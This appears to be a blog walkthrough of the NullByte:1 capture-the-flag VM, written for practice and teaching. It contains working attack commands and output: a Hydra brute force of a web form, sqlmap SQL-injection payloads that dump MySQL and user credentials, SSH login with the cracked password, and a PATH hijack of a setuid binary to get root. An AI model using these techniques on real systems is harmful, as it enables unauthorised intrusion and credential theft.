“Use your lateral thinking skills, maybe you’ll need to write some code.” – ly0n
More information and OVA file download please check here.
Attacker & Target
Attacker: Kali Linux (10.10.10.130/24)
Target: NullByte: 1 (10.10.10.134/24)
Vulnerability & Exploit
Found hidden information in picture and open the hidden path
Weak passwords used in Web login form, the password can be found by brute-force attacking
SQL injection vulnerability found in username searching page
Exploit SQL injection vulnerability to get user credentials, also can get a limited shell
Found user ramses with Base64 encoded MD5 password which can be cracked easily and SSH login as ramses
Mis-configuration program which has setuid set and did not use full path inside of system call. Exploit it to get ROOT
Method
Scanned the network to discover the target server [Net Discover]
Port scanned the target to discover the running services and open ports [unicornscan & nmap]
Web application vulnerability scanned to discover any web vulnerability [nikto]
Brute force scan to find hidden path [dirb]
Web information gathering and interacting with the web server [firefox]
Download picture from index.html and reveal the hidden information stored in it
Found the hidden folder and a login page which has comment saying that the password is simple
Use hydra with rockyou.txt to burte force crack the login password [THC Hydra]
The next username searching page is SQL injection vulnerable, exploit it to downlaod system sensitive file, login credentials and also get a limited shell [sqlmap]
Crack user ramses’s password and ssh login to get a better shell
System enumeration and Exploit vulnerable program with setuid bit set to get ROOT
Tools
All the tools used here can be found in Kali Linux
Using netdiscover as routine to detect the target’s IP address (10.10.10.134 in this case).
1234567891011
F4l13n@kali:~$ sudo netdiscover -r 10.1.1.0/24
Currently scanning: Finished! | Screen View: Unique Hosts
5 Captured ARP Req/Rep packets, from 5 hosts. Total size: 300
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor
-----------------------------------------------------------------------------
10.1.1.1 00:50:56:c0:00:08 01 060 VMWare, Inc.
10.1.1.2 00:50:56:fd:d1:6b 01 060 VMWare, Inc.
10.1.1.134 00:0c:29:e1:e0:98 01 060 VMware, Inc.
10.1.1.254 00:50:56:ee:31:18 01 060 VMWare, Inc.
10.10.10.134 is our Target!
Then run uniscornscan to detect opening ports on the target (unicornscan is much faster than nmap when doing a full ports scan, so here I use it to make a full scan and then use nmap to do a deep scan on target ports).
123456
F4l13n@kali:~$ sudo us -H -msf -Iv -p 1-65535 10.1.1.134
listener statistics 147984 packets recieved 0 packets droped and 0 interface drops
TCP open http[ 80] from 10.1.1.134 ttl 64
TCP open sunrpc[ 111] from 10.1.1.134 ttl 64
TCP open multiling-http[ 777] from 10.1.1.134 ttl 64
TCP open unknown[32942] from 10.1.1.134 ttl 64
From the result above, TCP port 80, 111, 777 and 32942 have been discovered.
Then I run NMAP scan to probe more detail information for the four opening ports.
# Nmap 6.49BETA4 scan initiated Mon Aug 17 07:06:13 2015 as: nmap -v -sV -O -A -T4 -p 80,111,777,32942 -oN NullByte_nmap.txt 10.1.1.134
Nmap scan report for 10.1.1.134
Host is up (0.00044s latency).
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.10 ((Debian))
|_http-methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title: Null Byte 00 - level 1
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100024 1 32942/tcp status
|_ 100024 1 47213/udp status
777/tcp open ssh OpenSSH 6.7p1 Debian 5 (protocol 2.0)
| ssh-hostkey:
| 1024 16:30:13:d9:d5:55:36:e8:1b:b7:d9:ba:55:2f:d7:44 (DSA)
| 2048 29:aa:7d:2e:60:8b:a6:a1:c2:bd:7c:c8:bd:3c:f4:f2 (RSA)
|_ 256 60:06:e3:64:8f:8a:6f:a7:74:5a:8b:3f:e1:24:93:96 (ECDSA)
32942/tcp open status 1 (RPC #100024)
MAC Address: 00:0C:29:E1:E0:98 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X
OS CPE: cpe:/o:linux:linux_kernel:3
OS details: Linux 3.2 - 3.19
Uptime guess: 0.029 days (since Mon Aug 17 06:25:06 2015)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=264 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 0.44 ms 10.1.1.134
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Aug 17 07:06:29 2015 -- 1 IP address (1 host up) scanned in 16.18 seconds
I found that the port 777 is running SSH and apache 2.4.10 is running on port 80, and the server is Debian Linux with 3.x kernel.
Then I use nikto to scan if any known vulnerabilty can be found which will be a life saver.
12345678910111213141516171819202122
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 10.1.1.134
+ Target Hostname: 10.1.1.134
+ Target Port: 80
+ Start Time: 2015-08-17 07:01:56 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.10 (Debian)
+ Server leaks inodes via ETags, header found with file /, fields: 0xc4 0x51c42a5c32a70
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.4.10 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current.
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS
+ Uncommon header 'x-ob_mode' found, with contents: 0
+ OSVDB-3233: /icons/README: Apache default file found.
+ /phpmyadmin/: phpMyAdmin directory found
+ 7668 requests: 0 error(s) and 9 item(s) reported on remote host
+ End Time: 2015-08-17 07:02:17 (GMT-4) (21 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
Nothing too exciting, but found phpmyadmin installed and a folder /phpmyadmin/.
Secret in the Pic
Then I tried default password and some weak passwords with login phpmyadmin, but all failed.
Then I open iceweasel browser to have a close look at the website. There is only a picture with a sentence If you search for the laws of harmony, you will find knowledge.
Nothing wrong about the sentence… but hint is hidden in the picture…
Pay attention to the second line below the GIF89a:
P-): kzMb5nVYJw
Then I tried to use the string ‘kzMb5nVYJw’ as an hidden folder and found the hidden login page:
From the source code, I noticed that this form is not connected to mysql and password is not complex… so here would be an online brute force attacking based on password-dict.
I use Hydra with rockyou.txt dictionary to brute force the login form and got the password: elite. (The parameter -l admin does not make any sense, just get rid of errors)
1234567891011
F4l13n@kali:~/vulnhub/NullByte$ sudo hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.1.1.134 http-post-form "/kzMb5nVYJw/index.php:key=^PASS^:invalid"
[sudo] password for F4l13n:
Hydra v8.1 (c) 2014 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (http://www.thc.org/thc-hydra) starting at 2015-08-17 09:20:13
[WARNING] Restorefile (./hydra.restore) from a previous session found, to prevent overwriting, you have 10 seconds to abort...
[DATA] max 16 tasks per 1 server, overall 64 tasks, 14344399 login tries (l:1/p:14344399), ~14008 tries per task
[DATA] attacking service http-post-form on port 80
[80][http-post-form] host: 10.1.1.134 login: admin password: elite
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2015-08-17 09:20:57
When I logged in with password elite, I have been forwarded to the following username searching page.
After tired several common SQLi test, I found SQL injection vulnerability exists in the parameter usrtosearch, the injection point is http://10.1.1.134/kzMb5nVYJw/420search.php?usrtosearch=admin
kali# sqlmap -u "http://10.1.1.134/kzMb5nVYJw/420search.php?usrtosearch=123*" --dbs
... ...
[09:45:30] [WARNING] in OR boolean-based injections, please consider usage of switch '--drop-set-cookie' if you experience any problems during data retrieval
URI parameter '#1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection point(s) with a total of 151 HTTP(s) requests:
---
Parameter: #1* (URI)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
Payload: http://10.1.1.134:80/kzMb5nVYJw/420search.php?usrtosearch=-8162" OR 3808=3808#
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT - comment)
Payload: http://10.1.1.134:80/kzMb5nVYJw/420search.php?usrtosearch=123" AND (SELECT * FROM (SELECT(SLEEP(5)))hjFz)#
Type: UNION query
Title: MySQL UNION query (NULL) - 3 columns
Payload: http://10.1.1.134:80/kzMb5nVYJw/420search.php?usrtosearch=123" UNION ALL SELECT NULL,NULL,CONCAT(0x7170706271,0x6845736a5777725a736a,0x71706b7a71)#
---
[09:45:32] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian
web application technology: Apache 2.4.10
back-end DBMS: MySQL 5.0.12
[09:45:32] [INFO] fetching database names
available databases [5]:
[*] information_schema
[*] mysql
[*] performance_schema
[*] phpmyadmin
[*] seth
[09:45:33] [INFO] fetched data logged to text files under '/root/.sqlmap/output/10.1.1.134'
[*] shutting down at 09:45:33
Checking the databases to grab passwords:
123456789101112131415161718192021
kali# sqlmap -u "http://10.1.1.134/kzMb5nVYJw/420search.php?usrtosearch=123*" --batch --smart --dump -C User,Password,Host,Super_priv -T user -D mysql
... ...
Database: mysql
Table: user
[6 entries]
+------------------+-------------------------------------------------------+-----------+------------+
| User | Password | Host | Super_priv |
+------------------+-------------------------------------------------------+-----------+------------+
| root | *18DC78FB0C441444482C7D1132C7A23D705DAFA7 (sunnyvale) | localhost | Y |
| root | *18DC78FB0C441444482C7D1132C7A23D705DAFA7 (sunnyvale) | nullbyte | Y |
| root | *18DC78FB0C441444482C7D1132C7A23D705DAFA7 (sunnyvale) | 127.0.0.1 | Y |
| root | *18DC78FB0C441444482C7D1132C7A23D705DAFA7 (sunnyvale) | ::1 | Y |
| debian-sys-maint | *BD9EDF51931EC5408154EBBB88AA01DA22B8A8DC | localhost | Y |
| phpmyadmin | *18DC78FB0C441444482C7D1132C7A23D705DAFA7 (sunnyvale) | localhost | N |
+------------------+-------------------------------------------------------+-----------+------------+
[09:56:13] [WARNING] table 'mysql.`user`' dumped to CSV file '/root/.sqlmap/output/10.1.1.134/dump/mysql/user-f3649c95.csv'
[09:56:13] [INFO] fetched data logged to text files under '/root/.sqlmap/output/10.1.1.134'
[*] shutting down at 09:56:13
Found mysql database login (this also can be used to login phpmyadmin): root / sunnyvale
Be ramses!
There is another users table in database seth, which including the password hash of user ramses
1234567891011121314151617181920212223
kali# sqlmap -u "http://10.1.1.134/kzMb5nVYJw/420search.php?usrtosearch=123*" --batch --smart --dump -T users -D seth
... ...
[10:12:15] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian
web application technology: Apache 2.4.10
back-end DBMS: MySQL 5.0.12
[10:12:15] [INFO] fetching columns 'position, user, id, pass' for table 'users' in database 'seth'
[10:12:15] [INFO] fetching entries of column(s) '`position`, `user`, id, pass' for table 'users' in database 'seth'
[10:12:15] [INFO] analyzing table dump for possible password hashes
Database: seth
Table: users
[2 entries]
+----+--------+------------+---------------------------------------------+
| id | user | position | pass |
+----+--------+------------+---------------------------------------------+
| 1 | ramses | <blank> | YzZkNmJkN2ViZjgwNmY0M2M3NmFjYzM2ODE3MDNiODE |
| 2 | isis | employee | --not allowed-- |
+----+--------+------------+---------------------------------------------+
[10:12:15] [INFO] table 'seth.users' dumped to CSV file '/root/.sqlmap/output/10.1.1.134/dump/seth/users.csv'
[10:12:15] [INFO] fetched data logged to text files under '/root/.sqlmap/output/10.1.1.134'
[*] shutting down at 10:12:15
Found user login credentials: ramses / YzZkNmJkN2ViZjgwNmY0M2M3NmFjYzM2ODE3MDNiODE
Base64 decoded the encrypted password and got a MD5 hash: c6d6bd7ebf806f43c76acc3681703b81
From previous findings, I know SSH is open on port 777, so try to SSH login with cracked password ramses / omega and bingo!
123456789101112131415
F4l13n@kali:~/vulnhub/NullByte/sqlmap_rst$ ssh ramses@10.1.1.134 -p 777
ramses@10.1.1.134's password:
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sun Aug 2 01:38:58 2015 from 192.168.1.109
ramses@NullByte:~$ id
uid=1002(ramses) gid=1002(ramses) groups=1002(ramses)
ramses@NullByte:~$ pwd
/home/ramses
ramses@NullByte:~$
Now I am ramses!
Privilege Escalation
Looking around and found interesting program procwatch which has setuid set in the folder /var/www/backup
By running the program and analysing the outcome, I can recognize that it calls system command ps in the program. However the program does not use full path of ps, so here is mis-configuration vulnerability which could be exploited by an attacker to make fake ps and set $PATH to get ROOT privilege.
Then I wrote a shell script and saved as ‘ps’, and grant executable permition for it.
ramses@NullByte:/var/www/backup$ ./procwatch
uid=1002(ramses) gid=1002(ramses) euid=0(root) groups=1002(ramses)
# id
uid=1002(ramses) gid=1002(ramses) euid=0(root) groups=1002(ramses)
# cd /root
# ls -l
total 4
-rw-r--r-- 1 root root 1170 Aug 2 01:45 proof.txt
Catch the flag proof.txt.
1234567891011121314151617181920212223242526272829
# cat proof.txt
adf11c7a9e6523e630aaf3b9b7acb51d
It seems that you have pwned the box, congrats.
Now you done that I wanna talk with you. Write a walk & mail at
xly0n@sigaint.org attach the walk and proof.txt
If sigaint.org is down you may mail at nbsly0n@gmail.com
USE THIS PGP PUBLIC KEY
-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: BCPG C# v1.6.1.0
mQENBFW9BX8BCACVNFJtV4KeFa/TgJZgNefJQ+fD1+LNEGnv5rw3uSV+jWigpxrJ
Q3tO375S1KRrYxhHjEh0HKwTBCIopIcRFFRy1Qg9uW7cxYnTlDTp9QERuQ7hQOFT
e4QU3gZPd/VibPhzbJC/pdbDpuxqU8iKxqQr0VmTX6wIGwN8GlrnKr1/xhSRTprq
Cu7OyNC8+HKu/NpJ7j8mxDTLrvoD+hD21usssThXgZJ5a31iMWj4i0WUEKFN22KK
+z9pmlOJ5Xfhc2xx+WHtST53Ewk8D+Hjn+mh4s9/pjppdpMFUhr1poXPsI2HTWNe
YcvzcQHwzXj6hvtcXlJj+yzM2iEuRdIJ1r41ABEBAAG0EW5ic2x5MG5AZ21haWwu
Y29tiQEcBBABAgAGBQJVvQV/AAoJENDZ4VE7RHERJVkH/RUeh6qn116Lf5mAScNS
HhWTUulxIllPmnOPxB9/yk0j6fvWE9dDtcS9eFgKCthUQts7OFPhc3ilbYA2Fz7q
m7iAe97aW8pz3AeD6f6MX53Un70B3Z8yJFQbdusbQa1+MI2CCJL44Q/J5654vIGn
XQk6Oc7xWEgxLH+IjNQgh6V+MTce8fOp2SEVPcMZZuz2+XI9nrCV1dfAcwJJyF58
kjxYRRryD57olIyb9GsQgZkvPjHCg5JMdzQqOBoJZFPw/nNCEwQexWrgW7bqL/N8
TM2C0X57+ok7eqj8gUEuX/6FxBtYPpqUIaRT9kdeJPYHsiLJlZcXM0HZrPVvt1HU
Gms=
=PiAQ
-----END PGP PUBLIC KEY BLOCK-----